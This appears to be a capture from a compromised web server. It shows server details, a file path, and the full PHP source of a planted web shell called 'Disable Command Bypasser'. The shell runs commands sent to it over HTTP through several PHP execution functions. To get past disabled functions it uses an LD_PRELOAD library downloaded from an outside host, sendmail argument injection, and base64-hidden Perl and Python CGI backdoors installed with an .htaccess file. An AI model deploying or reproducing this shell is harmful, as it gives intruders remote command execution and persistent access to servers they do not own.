uawdijnntqw1x1x1
IP : 216.73.216.39
Hostname : diefsweb003.fsit.ch
Kernel : Linux diefsweb003.fsit.ch 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
wirbesti
/
lscache
/
..
/
www
/
cmdbypass.php
/
/
<!-- Created with love by Anon7 --> <!-- if you want to recode, dont forget to put author name please --> <html> <head> <title>Disable Command Bypasser</title> <?php if (isset($_GET['pcntl'])) { header("Content-Type: text/html"); echo "<pre style='text-align: left; white-space: pre-line;'>"; $check = file_get_contents("/tmp/pcntl.txt"); if (empty($check)) { echo "Kagak Vuln / Belum Rejeki wkwk"; } else { echo $check; } exit(); } elseif (isset($_GET['putenv'])) { header("Content-Type: text/html"); echo "<pre style='text-align: left; white-space: pre-line;'>"; $check = file_get_contents("/tmp/putenv.txt"); if (empty($check)) { echo "Menunggu Command Tereksekusi ...<br>(putenv Kadang Lama Tereksekusi, jadi sabar ya wkwk)"; } else { echo $check; } exit(); } ?> </head> <style type="text/css"> c { color: green; } d { color: red; } </style> <script type="text/javascript"> function wkwk() { var cmd = document.getElementById('cmd').value; var checkbox = document.getElementById('base64'); if (checkbox.checked == true) { document.getElementById('cmd').value = btoa(cmd); } else { document.getElementById('cmd').value = atob(cmd); } } </script> <font face=courier size=2>Disable Command Bypasser by Anon7 | Disable Function : [<?php $dis = @ini_get("disable_functions"); if (empty($dis)){echo "<c>NONE</c>";}else{echo "<d>".$dis."</d>";} ?>]<hr> <form method="post"> Command : <input type="text" name="cmd" id="cmd" size="50"> | Base64<input type="checkbox" name="base64" onclick="wkwk();" id="base64" value="base64"><br><br> <button name="exec" value="exec" <?php if(strpos($dis,"exec")!==false){echo "disabled";}?> >exec</button> <button name="passthru" value="passthru" <?php if(strpos($dis,"passthru")!==false){echo "disabled";}?>>passthru</button> <button name="shell_exec" value="shell_exec" <?php if(strpos($dis,"shell_exec")!==false){echo "disabled";}?>>shell_exec</button> <button name="system" value="system" <?php if(strpos($dis,"system")!==false){echo "disabled";}?>>system</button> <button name="popen" value="popen" <?php if(strpos($dis,"popen")!==false){echo "disabled";}?>>popen</button> <button name="proc_open" value="proc_open" <?php if(strpos($dis,"proc_open")!==false){echo "disabled";}?>>proc_open</button><br><br> <button name="perl" value="perl">perl</button> <button name="python" value="python">python</button> <button name="pcntl_exec" value="pcntl_exec" <?php if(!extension_loaded("pcntl")){echo "disabled";}?>>pcntl_exec</button> <button name="putenv" value="putenv" <?php if(strpos($dis,"putenv")!==false || strpos($dis,"error_log")!==false){echo "disabled";}?>>putenv</button> <button name="mail" value="mail" <?php if(strpos($dis,"mail")!==false || !file_exists("/usr/bin/sendmail")){echo "disabled";}?>>mail</button> </form> <hr></font> <?php if (isset($_POST['cmd'])) { ob_implicit_flush();ob_end_flush(); echo "<pre>"; if (isset($_POST['base64'])) { $set = base64_decode($_POST['cmd']); echo "Executed Command : ".htmlspecialchars($set)."<br>"; } else { $set = $_POST['cmd']; echo "Executed Command : ".htmlspecialchars($set)."<br>"; } if (isset($_POST['exec'])) { exec($set, $output); foreach ($output as $exec) { echo htmlspecialchars($exec)."\n"; } } if (isset($_POST['passthru'])) { htmlspecialchars(passthru($set)); } if (isset($_POST['shell_exec'])) { echo htmlspecialchars(shell_exec($set)); } if (isset($_POST['system'])) { htmlspecialchars(system($set)); } if (isset($_POST['popen'])) { echo htmlspecialchars(fread(popen($set, 'r'), 8192)); //$pop = popen($set, 'r'); //while ($com = fgets($pop, 2048)) { // echo htmlspecialchars($com); //} } if (isset($_POST['proc_open'])) { $process = proc_open($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes); echo htmlspecialchars(stream_get_contents($pipes[1])); } if (isset($_POST['pcntl_exec'])) { $web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo "<button onclick=\"window.open('".$web."?pcntl');\">Click To Show Output</button><hr>"; pcntl_exec("/bin/bash", ["-c", $set." | tee /tmp/pcntl.txt"]); } if (isset($_POST['mail'])) { $cmd = $set." | tee /tmp/mail_anon.txt"; file_put_contents('/tmp/readflag.sh', $cmd); chmod('/tmp/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /tmp/readflag.sh\"'); echo file_get_contents('/tmp/mail_anon.txt'); } if (isset($_POST['putenv'])) { if (!file_exists("/tmp/anon.so") || filesize("/tmp/anon.so") == "0") { file_put_contents("/tmp/anon.so", file_get_contents("https://github.com/whoami-45/php-code/raw/main/anon.so")); chmod("/tmp/anon.so", 0777); } $cmd = $set." | tee /tmp/putenv.txt"; echo "<button onclick=\"window.open('".$web."?putenv');\">Click To Show Output</button><hr>"; putenv("LD_PRELOAD=/tmp/anon.so"); putenv("CMD=".$cmd.""); if (strpos($dis,"error_log")!==false) { mail('g','i','o','o'); } error_log("a", 1); exit(); } if (isset($_POST['perl'])) { if (!file_exists("anon7")) { mkdir("anon7"); } if (!file_exists(base64_decode('YW5vbjcvLmh0YWNjZXNz')) || filesize(base64_decode('YW5vbjcvLmh0YWNjZXNz')) == "0") { file_put_contents(base64_decode('YW5vbjcvLmh0YWNjZXNz'), base64_decode("I0NyZWF0ZWQgYnkgQW5vbjcgQ29tbWFuZA0KT3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuYW5vbjcNCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuYW5vbjc=")); } if (!file_exists(base64_decode("YW5vbjcvcGVybC5hbm9uNw==")) || filesize(base64_decode("YW5vbjcvcGVybC5hbm9uNw==")) == "0") { file_put_contents(base64_decode("YW5vbjcvcGVybC5hbm9uNw=="), base64_decode("IyEvdXNyL2Jpbi9wZXJsICAgLUkvdXNyL2xvY2FsL2JhbmRtaW4NCnVzZSBNSU1FOjpCYXNlNjQ7cHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7aWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpe215ICgkaSwgJGtleSwgJHZhbCwgJGluKTtyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pO0BpbiA9IHNwbGl0KC8mLywgJGluKTtmb3JlYWNoICRpICgwIC4uICQjaW4peyRpblskaV0gPX4gcy9cKy8gL2c7KCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTska2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOyR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7JGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7JGlueyRrZXl9IC49ICR2YWw7fWlmKCRpbnsiY21kIn0pe3ByaW50IGRlY29kZV9iYXNlNjQoJGlueyJjaGVjayJ9KS4iIjtzeXN0ZW0oZGVjb2RlX2Jhc2U2NCgkaW57ImNtZCJ9KSk7cHJpbnQgIiJ9fQ==")); chmod(base64_decode("YW5vbjcvcGVybC5hbm9uNw=="), 0777); } $web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; $web = str_replace(basename($_SERVER['PHP_SELF']), "anon7/perl.anon7", $web); $ekse = htmlspecialchars(file_get_contents($web, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => 'cmd='.base64_encode($set).''))))); if ($ekse == false) { $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$web);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "cmd=".base64_encode($set)."");curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);echo htmlspecialchars(curl_exec($ch));curl_close ($ch); } } if (isset($_POST['python'])) { if (!file_exists("anon7")) { mkdir("anon7"); } if (!file_exists(base64_decode('YW5vbjcvLmh0YWNjZXNz')) || filesize(base64_decode('YW5vbjcvLmh0YWNjZXNz')) == "0") { file_put_contents(base64_decode('YW5vbjcvLmh0YWNjZXNz'), base64_decode("I0NyZWF0ZWQgYnkgQW5vbjcgQ29tbWFuZA0KT3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ0KQWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLWNnaSAuYW5vbjcNCkFkZEhhbmRsZXIgY2dpLXNjcmlwdCAuYW5vbjc=")); } if (!file_exists(base64_decode('YW5vbjcvcHl0aG9uLmFub243')) || filesize(base64_decode('YW5vbjcvcHl0aG9uLmFub243')) == "0") { file_put_contents(base64_decode('YW5vbjcvcHl0aG9uLmFub243'), base64_decode("IyEvdXNyL2Jpbi9weXRob24KI0dlbmVyYXRlZCBieSBBbm9uNwp0cnk6CiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpCmV4Y2VwdDoKICAgIHBhc3MKICAgIAppbXBvcnQgb3MsIGNnaQoKcGFyYW09Y2dpLkZpZWxkU3RvcmFnZSgpCmNtZD1wYXJhbS5nZXR2YWx1ZSgiMCIpCgpwcmludCgiQ29udGVudC10eXBlOnRleHQvaHRtbFxuIikKaWYgY21kIDoKICAgIHByaW50KG9zLnBvcGVuKGNtZCkucmVhZCgpLnJlcGxhY2UoIjwiLCIiKS5yZXBsYWNlKCI+IiwiIikp")); chmod(base64_decode('YW5vbjcvcHl0aG9uLmFub243'), 0777); } $web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; $web = str_replace(basename($_SERVER['PHP_SELF']), "anon7/python.anon7", $web); $ekse = htmlspecialchars(@file_get_contents($web, false, stream_context_create(array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => '0='.$set.''))))); if ($ekse == false) { $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$web);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, "0=".$set."");curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);echo htmlspecialchars(curl_exec($ch));curl_close ($ch); } } echo "</pre><hr>"; } ?>
/home/wirbesti/lscache/../www/cmdbypass.php